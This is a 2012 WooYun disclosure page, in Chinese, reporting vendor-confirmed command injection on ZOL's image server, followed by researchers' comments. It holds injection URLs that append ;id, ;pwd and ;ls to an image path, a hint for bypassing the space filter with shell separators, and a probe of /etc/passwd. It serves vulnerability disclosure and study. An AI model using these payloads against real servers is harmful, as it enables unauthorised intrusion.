当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07068

漏洞标题:中关村在线命令执行

相关厂商:中关村在线

漏洞作者: 冷冷的夜

提交时间:2012-05-17 20:57

修复时间:2012-07-01 20:58

公开时间:2012-07-01 20:58

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-17: 细节已通知厂商并且等待厂商处理中
2012-05-18: 厂商已经确认,细节仅向厂商公开
2012-05-28: 细节向核心白帽子及相关领域专家公开
2012-06-07: 细节向普通白帽子公开
2012-06-17: 细节向实习白帽子公开
2012-07-01: 细节向公众公开

简要描述:

RT,貌似很久很久了,一直没人报。但是有点脊柱脊柱,求大牛突破+分析,求学习

详细说明:

http://img.zol.com.cn/flea/size_photo/100x75/2568/2567328.jpg/;id
http://img.zol.com.cn/flea/size_photo/100x75/2568/2567328.jpg/;pwd
http://img.zol.com.cn/flea/size_photo/100x75/2568/2567328.jpg/;ls
但是貌似不能有空格,http://img.zol.com.cn/flea/size_photo/100x75/2568/2567328.jpg/;ls -al就不能执行
http://img.zol.com.cn/flea/size_photo/100x75/2568/2567328.jpg/;id;pwd;没有空格就能执行,我想应该是把空格转成%20导致不能执行了吧,求突破

漏洞证明:




WooYun官方解答:
具体bypass方式如图,使用*unix环境变量中的分隔符进行绕过。



修复方案:

版权声明:转载请注明来源 冷冷的夜@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-05-18 14:12

厂商回复:

谢谢 冷冷的夜!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-05-13 22:30 | charles ( 路人 | Rank:6 漏洞数:4 | 研究web安全,0day,漏洞挖掘,关注国内安全动...)

    早些年中关村在线就存在这样的漏洞.现在才公开!

  2. 2012-05-13 23:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @charles 你看到细节了啊?

  3. 2012-05-17 00:19 | 小雨 ( 普通白帽子 | Rank:105 漏洞数:19 | phper)

    关注。。。

  4. 2012-05-28 17:11 | PiaCa ( 普通白帽子 | Rank:129 漏洞数:10 | 简单点!啪......嚓~~)

    @xsser 2012-05-28: 细节向核心白帽子及相关领域专家公开看不到啊

  5. 2012-05-28 17:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @PiaCa 哈哈哈 你分不够嘛,按照黄色网站的机制,只有分高的会员可以看到分低的

  6. 2012-05-28 17:35 | PiaCa ( 普通白帽子 | Rank:129 漏洞数:10 | 简单点!啪......嚓~~)

    @xsser 早说是黄色网站的分级制度嘛,那我就理解了。^_^

  7. 2012-05-29 14:35 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    我草,利用环境变量中的分隔符进行绕过,学习了,感谢分享!!(*^__^*)

  8. 2012-05-29 14:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @冷冷的夜 也谢谢你的分享

  9. 2012-05-30 16:09 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    这个命令执行,是个啥原理呢?为啥图片后面可以直接执行命令,配置导致的?有相关学习资料没

  10. 2012-06-01 09:39 | charles ( 路人 | Rank:6 漏洞数:4 | 研究web安全,0day,漏洞挖掘,关注国内安全动...)

    @xsser 这个网站基本都被人拿过.所以很早就存在漏洞!不需要开就知道基本的理论及参数@

  11. 2012-06-10 08:14 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @charles 高手在民间呀 @冷冷的夜 同@gainover问

  12. 2012-06-12 09:09 | charles ( 路人 | Rank:6 漏洞数:4 | 研究web安全,0day,漏洞挖掘,关注国内安全动...)

    呵呵.民间的人基本不接触你们这帮人!

  13. 2012-06-12 09:47 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @gainover 原理是他这个表面是图片其实背后是webserver通过其他程序处理的

  14. 2012-06-12 09:54 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @xsser 这个都测试的出来?膜拜的不行了

  15. 2012-06-12 11:32 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @possible 你执行命令之后,去读下webserver配置,看下php源码就知道了

  16. 2012-06-12 12:10 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    @possible http://img.zol.com.cn/etc/passwd 看下这个报错,<b>Warning</b>: file_get_contents(http://bbs.zol.com.cn/upload_pic/0/index.jpg) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in <b>/www/img/html/postbbs/show_photo.php</b> on line <b>48</b><br />,应该是这个show_photo.php处理的

  17. 2012-06-12 12:11 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser 3ks,感觉这个情况蛮特别的哈。

  18. 2012-06-12 12:48 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @xsser @冷冷的夜 哦 谢谢 各位大神指点

  19. 2012-07-01 21:10 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    求形成原理,到底是为什么造成这个漏洞的

  20. 2013-08-29 20:11 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    标记一下